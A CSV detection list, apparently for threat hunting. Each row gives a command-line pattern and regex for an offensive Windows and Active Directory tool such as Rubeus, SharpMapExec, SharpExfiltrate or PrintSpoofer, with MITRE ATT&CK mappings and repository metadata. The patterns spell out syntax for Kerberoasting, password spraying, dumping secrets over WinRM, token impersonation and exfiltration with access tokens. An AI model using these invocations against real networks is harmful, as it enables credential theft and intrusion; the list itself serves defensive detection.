"*.exe Get-Sysadmins -Instance *",".{0,1000}\.exe\sGet\-Sysadmins\s\-Instance\s.{0,1000}","offensive_tool_keyword","SharpSQL","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","SharpSQL","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","4452"
"*.exe -gettgs -luid:*",".{0,1000}\.exe\s\-gettgs\s\-luid\:.{0,1000}","offensive_tool_keyword","GIUDA","Ask a TGS on behalf of another user without password","T1558.003 - T1059.003","TA0006 - TA0002","N/A","N/A","Exploitation tool","https://github.com/foxlox/GIUDA","1","0","N/A","N/A","9","5","469","68","2025-03-30T20:42:43Z","2023-07-19T15:37:07Z","4453"
"*.exe Get-UserPrivs -Instance *",".{0,1000}\.exe\sGet\-UserPrivs\s\-Instance\s.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","SharpSQL","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","4454"
"*.exe Get-UserPrivs -Instance *",".{0,1000}\.exe\sGet\-UserPrivs\s\-Instance\s.{0,1000}","offensive_tool_keyword","SharpSQL","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","SharpSQL","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","4455"
"*.exe --get-users-list > *",".{0,1000}\.exe\s\-\-get\-users\-list\s\>\s.{0,1000}","offensive_tool_keyword","SharpSpray","SharpSpray is a Windows domain password spraying tool written in .NET C#","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/iomoath/SharpSpray","1","0","N/A","N/A","10","2","130","21","2021-11-25T19:13:56Z","2021-08-31T16:09:45Z","4456"
"*.exe gmsainfo --sid *",".{0,1000}\.exe\sgmsainfo\s\-\-sid\s.{0,1000}","offensive_tool_keyword","GoldenGMSA","GolenGMSA tool for working with GMSA passwords","T1003.004 - T1078.003 - T1059.006","TA0006 - TA0004 - TA0002","N/A","N/A","Credential Access","https://github.com/Semperis/GoldenGMSA","1","0","N/A","N/A","7","2","144","22","2024-04-11T07:51:57Z","2022-02-03T10:32:05Z","4457"
"*.exe GoogleDrive --appname * --accesstoken * --filepath * --extensions * --memoryonly*",".{0,1000}\.exe\sGoogleDrive\s\-\-appname\s.{0,1000}\s\-\-accesstoken\s.{0,1000}\s\-\-filepath\s.{0,1000}\s\-\-extensions\s.{0,1000}\s\-\-memoryonly.{0,1000}","offensive_tool_keyword","SharpExfiltrate","Modular C# framework to exfiltrate loot over secure and trusted channels.","T1027 - T1567 - T1561","TA0010 - TA0040 - TA0005","N/A","N/A","Data Exfiltration","https://github.com/Flangvik/SharpExfiltrate","1","0","N/A","N/A","10","2","126","37","2021-09-12T17:08:02Z","2021-09-08T13:17:00Z","4458"
"*.exe --gpo --filter admin --domain*",".{0,1000}\.exe\s\-\-gpo\s\-\-filter\sadmin\s\-\-domain.{0,1000}","offensive_tool_keyword","StandIn","StandIn is a small .NET35/45 AD post-exploitation toolkit","T1087 - T1069 - T1558 - T1204 - T1136 - T1482","TA0007 - TA0003 - TA0006 - TA0004","N/A","N/A","Discovery","https://github.com/FuzzySecurity/StandIn","1","0","N/A","N/A","9","8","761","129","2023-12-02T21:20:09Z","2020-11-05T22:49:27Z","4459"
"*.exe -group=all *",".{0,1000}\.exe\s\-group\=all\s.{0,1000}","offensive_tool_keyword","seatbelt","Seatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. and many others","T1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518","TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011","N/A","Dispossessor","Persistence","https://github.com/GhostPack/Seatbelt","1","0","N/A","fp risks","10","10","4047","722","2025-01-10T20:12:49Z","2018-07-24T17:38:51Z","4460"
"*.exe -group=all -AuditPolicies*",".{0,1000}\.exe\s\-group\=all\s\-AuditPolicies.{0,1000}","offensive_tool_keyword","seatbelt","Seatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. and many others","T1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518","TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011","N/A","Dispossessor","Persistence","https://github.com/GhostPack/Seatbelt","1","0","N/A","N/A","10","10","4047","722","2025-01-10T20:12:49Z","2018-07-24T17:38:51Z","4461"
"*.exe -group=all -full*",".{0,1000}\.exe\s\-group\=all\s\-full.{0,1000}","offensive_tool_keyword","seatbelt","Seatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. and many others","T1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518","TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011","N/A","Dispossessor","Persistence","https://github.com/GhostPack/Seatbelt","1","0","N/A","fp risks","10","10","4047","722","2025-01-10T20:12:49Z","2018-07-24T17:38:51Z","4462"
"*.exe -group=remote *",".{0,1000}\.exe\s\-group\=remote\s.{0,1000}","offensive_tool_keyword","seatbelt","Seatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. and many others","T1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518","TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011","N/A","Dispossessor","Persistence","https://github.com/GhostPack/Seatbelt","1","0","N/A","fp risks","10","10","4047","722","2025-01-10T20:12:49Z","2018-07-24T17:38:51Z","4463"
"*.exe -group=system *",".{0,1000}\.exe\s\-group\=system\s.{0,1000}","offensive_tool_keyword","seatbelt","Seatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. and many others","T1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518","TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011","N/A","Dispossessor","Persistence","https://github.com/GhostPack/Seatbelt","1","0","N/A","fp risks","10","10","4047","722","2025-01-10T20:12:49Z","2018-07-24T17:38:51Z","4464"
"*.exe -group=user *",".{0,1000}\.exe\s\-group\=user\s.{0,1000}","offensive_tool_keyword","seatbelt","Seatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. and many others","T1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518","TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011","N/A","Dispossessor","Persistence","https://github.com/GhostPack/Seatbelt","1","0","N/A","fp risks","10","10","4047","722","2025-01-10T20:12:49Z","2018-07-24T17:38:51Z","4465"
"*.exe hash /password:*",".{0,1000}\.exe\shash\s\/password\:.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1482 - T1558.001 - T1558.002 - T1558.003 - T1558.004","TA0006","N/A","Black Basta - Dispossessor - Conti - Diavol - Ryuk - Wizard Spider - APT29 - COZY BEAR","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","10","4409","804","2025-04-17T10:11:57Z","2018-09-23T23:59:03Z","4466"
"*.exe HijackablePaths*",".{0,1000}\.exe\sHijackablePaths.{0,1000}","offensive_tool_keyword","SharpUp","SharpUp is a C# port of various PowerUp functionality. Currently. only the most common checks have been ported. no weaponization functions have yet been implemented.","T1003 - T1082 - T1057 - T1069 - T1083","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/GhostPack/SharpUp","1","0","N/A","N/A","N/A","10","1344","253","2024-02-14T16:38:26Z","2018-07-24T17:39:33Z","4467"
"*.exe -i -c powershell -e netlogon*",".{0,1000}\.exe\s\-i\s\-c\spowershell\s\-e\snetlogon.{0,1000}","offensive_tool_keyword","PrivFu","ArtsOfGetSystem privesc tools","T1134 - T1134.001 - T1078 - T1059 - T1075","TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu/","1","0","N/A","ArtsOfGetSystem","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","4469"
"*.exe -i -c powershell.exe*",".{0,1000}\.exe\s\-i\s\-c\spowershell\.exe.{0,1000}","offensive_tool_keyword","printspoofer","Abusing impersonation privileges through the Printer Bug","T1134 - T1003 - T1055","TA0004 - TA0003 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrintSpoofer","1","0","N/A","N/A","10","10","1971","342","2020-09-10T17:49:41Z","2020-04-28T08:26:29Z","4470"
"*.exe --impersonate --pid *",".{0,1000}\.exe\s\-\-impersonate\s\-\-pid\s.{0,1000}","offensive_tool_keyword","TokenPlayer","Manipulating and Abusing Windows Access Tokens","T1134 - T1484 - T1055 - T1078","TA0004 - TA0005 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/S1ckB0y1337/TokenPlayer","1","0","N/A","N/A","10","3","274","45","2021-01-15T16:07:47Z","2020-08-20T23:05:49Z","4476"
"*.exe Invoke-CLRAsm -Instance * -Command *",".{0,1000}\.exe\sInvoke\-CLRAsm\s\-Instance\s.{0,1000}\s\-Command\s.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","SharpSQL","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","4477"
"*.exe Invoke-CLRAsm -Instance * -Command *",".{0,1000}\.exe\sInvoke\-CLRAsm\s\-Instance\s.{0,1000}\s\-Command\s.{0,1000}","offensive_tool_keyword","SharpSQL","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","SharpSQL","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","4478"
"*.exe Invoke-LinkedOSCmd -Instance *",".{0,1000}\.exe\sInvoke\-LinkedOSCmd\s\-Instance\s.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","SharpSQL","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","4479"
"*.exe Invoke-LinkedOSCmd -Instance *",".{0,1000}\.exe\sInvoke\-LinkedOSCmd\s\-Instance\s.{0,1000}","offensive_tool_keyword","SharpSQL","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","SharpSQL","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","4480"
"*.exe Invoke-OLEObject *",".{0,1000}\.exe\sInvoke\-OLEObject\s.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","SharpSQL","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","4481"
"*.exe Invoke-OLEObject *",".{0,1000}\.exe\sInvoke\-OLEObject\s.{0,1000}","offensive_tool_keyword","SharpSQL","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","SharpSQL","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","4482"
"*.exe Invoke-OSCmd -Instance * -Command *",".{0,1000}\.exe\sInvoke\-OSCmd\s\-Instance\s.{0,1000}\s\-Command\s.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","SharpSQL","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","4483"
"*.exe Invoke-OSCmd -Instance * -Command *",".{0,1000}\.exe\sInvoke\-OSCmd\s\-Instance\s.{0,1000}\s\-Command\s.{0,1000}","offensive_tool_keyword","SharpSQL","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","SharpSQL","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","4484"
"*.exe Invoke-UserImpersonation *",".{0,1000}\.exe\sInvoke\-UserImpersonation\s.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","SharpSQL","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","4485"
"*.exe Invoke-UserImpersonation *",".{0,1000}\.exe\sInvoke\-UserImpersonation\s.{0,1000}","offensive_tool_keyword","SharpSQL","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","SharpSQL","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","4486"
"*.exe kdsinfo --guid *",".{0,1000}\.exe\skdsinfo\s\-\-guid\s.{0,1000}","offensive_tool_keyword","GoldenGMSA","GolenGMSA tool for working with GMSA passwords","T1003.004 - T1078.003 - T1059.006","TA0006 - TA0004 - TA0002","N/A","N/A","Credential Access","https://github.com/Semperis/GoldenGMSA","1","0","N/A","N/A","7","2","144","22","2024-04-11T07:51:57Z","2022-02-03T10:32:05Z","4488"
"*.exe kerberoast /domain*",".{0,1000}\.exe\skerberoast\s\/domain.{0,1000}","offensive_tool_keyword","SharpPack","collection of C# tools that include functionalities like Kerberoasting - ticket manipulation - Mimikatz - privilege escalation - domain enumeration and more","T1558.003 - T1003 - T1059.004 - T1078 - T1212 - T1087 - T1016 - T1071 - T1555 - T1203","TA0003 - TA0004 - TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tool","https://github.com/Lexus89/SharpPack","1","0","N/A","N/A","10","1","78","19","2019-08-12T13:25:25Z","2018-10-01T12:45:16Z","4489"
"*.exe kerberos ldap * /m:spraydata*",".{0,1000}\.exe\skerberos\sldap\s.{0,1000}\s\/m\:spraydata.{0,1000}","offensive_tool_keyword","SharpMapExec","A sharpen version of CrackMapExec","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/cube0x0/SharpMapExec","1","0","N/A","N/A","10","7","664","124","2021-11-17T17:53:12Z","2020-12-01T13:03:50Z","4490"
"*.exe kerberos ldap * /password:* /dc:*",".{0,1000}\.exe\skerberos\sldap\s.{0,1000}\s\/password\:.{0,1000}\s\/dc\:.{0,1000}","offensive_tool_keyword","SharpMapExec","A sharpen version of CrackMapExec","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/cube0x0/SharpMapExec","1","0","N/A","N/A","10","7","664","124","2021-11-17T17:53:12Z","2020-12-01T13:03:50Z","4491"
"*.exe kerberos ldap * /ticket:* /m:*",".{0,1000}\.exe\skerberos\sldap\s.{0,1000}\s\/ticket\:.{0,1000}\s\/m\:.{0,1000}","offensive_tool_keyword","SharpMapExec","A sharpen version of CrackMapExec","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/cube0x0/SharpMapExec","1","0","N/A","N/A","10","7","664","124","2021-11-17T17:53:12Z","2020-12-01T13:03:50Z","4492"
"*.exe kerberos reg32 * /m:check_pslockdown*",".{0,1000}\.exe\skerberos\sreg32\s.{0,1000}\s\/m\:check_pslockdown.{0,1000}","offensive_tool_keyword","SharpMapExec","A sharpen version of CrackMapExec","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/cube0x0/SharpMapExec","1","0","N/A","N/A","10","7","664","124","2021-11-17T17:53:12Z","2020-12-01T13:03:50Z","4493"
"*.exe kerberos reg32 * /m:check_pslogging*",".{0,1000}\.exe\skerberos\sreg32\s.{0,1000}\s\/m\:check_pslogging.{0,1000}","offensive_tool_keyword","SharpMapExec","A sharpen version of CrackMapExec","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/cube0x0/SharpMapExec","1","0","N/A","N/A","10","7","664","124","2021-11-17T17:53:12Z","2020-12-01T13:03:50Z","4494"
"*.exe kerberos reg32 * /m:disable_pslockdown*",".{0,1000}\.exe\skerberos\sreg32\s.{0,1000}\s\/m\:disable_pslockdown.{0,1000}","offensive_tool_keyword","SharpMapExec","A sharpen version of CrackMapExec","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/cube0x0/SharpMapExec","1","0","N/A","N/A","10","7","664","124","2021-11-17T17:53:12Z","2020-12-01T13:03:50Z","4495"
"*.exe kerberos reg32 * /password:* /dc:*",".{0,1000}\.exe\skerberos\sreg32\s.{0,1000}\s\/password\:.{0,1000}\s\/dc\:.{0,1000}","offensive_tool_keyword","SharpMapExec","A sharpen version of CrackMapExec","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/cube0x0/SharpMapExec","1","0","N/A","N/A","10","7","664","124","2021-11-17T17:53:12Z","2020-12-01T13:03:50Z","4496"
"*.exe kerberos reg32 * /ticket:*",".{0,1000}\.exe\skerberos\sreg32\s.{0,1000}\s\/ticket\:.{0,1000}","offensive_tool_keyword","SharpMapExec","A sharpen version of CrackMapExec","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/cube0x0/SharpMapExec","1","0","N/A","N/A","10","7","664","124","2021-11-17T17:53:12Z","2020-12-01T13:03:50Z","4497"
"*.exe kerberos smb * /computername:* /ticket:*",".{0,1000}\.exe\skerberos\ssmb\s.{0,1000}\s\/computername\:.{0,1000}\s\/ticket\:.{0,1000}","offensive_tool_keyword","SharpMapExec","A sharpen version of CrackMapExec","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/cube0x0/SharpMapExec","1","0","N/A","N/A","10","7","664","124","2021-11-17T17:53:12Z","2020-12-01T13:03:50Z","4498"
"*.exe kerberos smb * /m:shares*",".{0,1000}\.exe\skerberos\ssmb\s.{0,1000}\s\/m\:shares.{0,1000}","offensive_tool_keyword","SharpMapExec","A sharpen version of CrackMapExec","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/cube0x0/SharpMapExec","1","0","N/A","N/A","10","7","664","124","2021-11-17T17:53:12Z","2020-12-01T13:03:50Z","4499"
"*.exe kerberos smb * /password:* /dc:*",".{0,1000}\.exe\skerberos\ssmb\s.{0,1000}\s\/password\:.{0,1000}\s\/dc\:.{0,1000}","offensive_tool_keyword","SharpMapExec","A sharpen version of CrackMapExec","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/cube0x0/SharpMapExec","1","0","N/A","N/A","10","7","664","124","2021-11-17T17:53:12Z","2020-12-01T13:03:50Z","4500"
"*.exe kerberos smb * /ticket:* /computername:*",".{0,1000}\.exe\skerberos\ssmb\s.{0,1000}\s\/ticket\:.{0,1000}\s\/computername\:.{0,1000}","offensive_tool_keyword","SharpMapExec","A sharpen version of CrackMapExec","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/cube0x0/SharpMapExec","1","0","N/A","N/A","10","7","664","124","2021-11-17T17:53:12Z","2020-12-01T13:03:50Z","4501"
"*.exe kerberos winrm * /computername:*",".{0,1000}\.exe\skerberos\swinrm\s.{0,1000}\s\/computername\:.{0,1000}","offensive_tool_keyword","SharpMapExec","A sharpen version of CrackMapExec","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/cube0x0/SharpMapExec","1","0","N/A","N/A","10","7","664","124","2021-11-17T17:53:12Z","2020-12-01T13:03:50Z","4502"
"*.exe kerberos winrm * /m:assembly /p:*",".{0,1000}\.exe\skerberos\swinrm\s.{0,1000}\s\/m\:assembly\s\/p\:.{0,1000}","offensive_tool_keyword","SharpMapExec","A sharpen version of CrackMapExec","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/cube0x0/SharpMapExec","1","0","N/A","N/A","10","7","664","124","2021-11-17T17:53:12Z","2020-12-01T13:03:50Z","4503"
"*.exe kerberos winrm * /m:comsvcs*",".{0,1000}\.exe\skerberos\swinrm\s.{0,1000}\s\/m\:comsvcs.{0,1000}","offensive_tool_keyword","SharpMapExec","A sharpen version of CrackMapExec","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/cube0x0/SharpMapExec","1","0","N/A","N/A","10","7","664","124","2021-11-17T17:53:12Z","2020-12-01T13:03:50Z","4504"
"*.exe kerberos winrm * /m:download *",".{0,1000}\.exe\skerberos\swinrm\s.{0,1000}\s\/m\:download\s.{0,1000}","offensive_tool_keyword","SharpMapExec","A sharpen version of CrackMapExec","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/cube0x0/SharpMapExec","1","0","N/A","N/A","10","7","664","124","2021-11-17T17:53:12Z","2020-12-01T13:03:50Z","4505"
"*.exe kerberos winrm * /m:exec /a:*",".{0,1000}\.exe\skerberos\swinrm\s.{0,1000}\s\/m\:exec\s\/a\:.{0,1000}","offensive_tool_keyword","SharpMapExec","A sharpen version of CrackMapExec","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/cube0x0/SharpMapExec","1","0","N/A","N/A","10","7","664","124","2021-11-17T17:53:12Z","2020-12-01T13:03:50Z","4506"
"*.exe kerberos winrm * /m:secrets*",".{0,1000}\.exe\skerberos\swinrm\s.{0,1000}\s\/m\:secrets.{0,1000}","offensive_tool_keyword","SharpMapExec","A sharpen version of CrackMapExec","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/cube0x0/SharpMapExec","1","0","N/A","N/A","10","7","664","124","2021-11-17T17:53:12Z","2020-12-01T13:03:50Z","4507"
"*.exe kerberos winrm * /m:upload*",".{0,1000}\.exe\skerberos\swinrm\s.{0,1000}\s\/m\:upload.{0,1000}","offensive_tool_keyword","SharpMapExec","A sharpen version of CrackMapExec","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/cube0x0/SharpMapExec","1","0","N/A","N/A","10","7","664","124","2021-11-17T17:53:12Z","2020-12-01T13:03:50Z","4508"
"*.exe kerberos winrm * /rc4:*",".{0,1000}\.exe\skerberos\swinrm\s.{0,1000}\s\/rc4\:.{0,1000}","offensive_tool_keyword","SharpMapExec","A sharpen version of CrackMapExec","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/cube0x0/SharpMapExec","1","0","N/A","N/A","10","7","664","124","2021-11-17T17:53:12Z","2020-12-01T13:03:50Z","4509"
"*.exe kerbspray *",".{0,1000}\.exe\skerbspray\s.{0,1000}","offensive_tool_keyword","SharpMapExec","A sharpen version of CrackMapExec","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/cube0x0/SharpMapExec","1","0","N/A","N/A","10","7","664","124","2021-11-17T17:53:12Z","2020-12-01T13:03:50Z","4510"
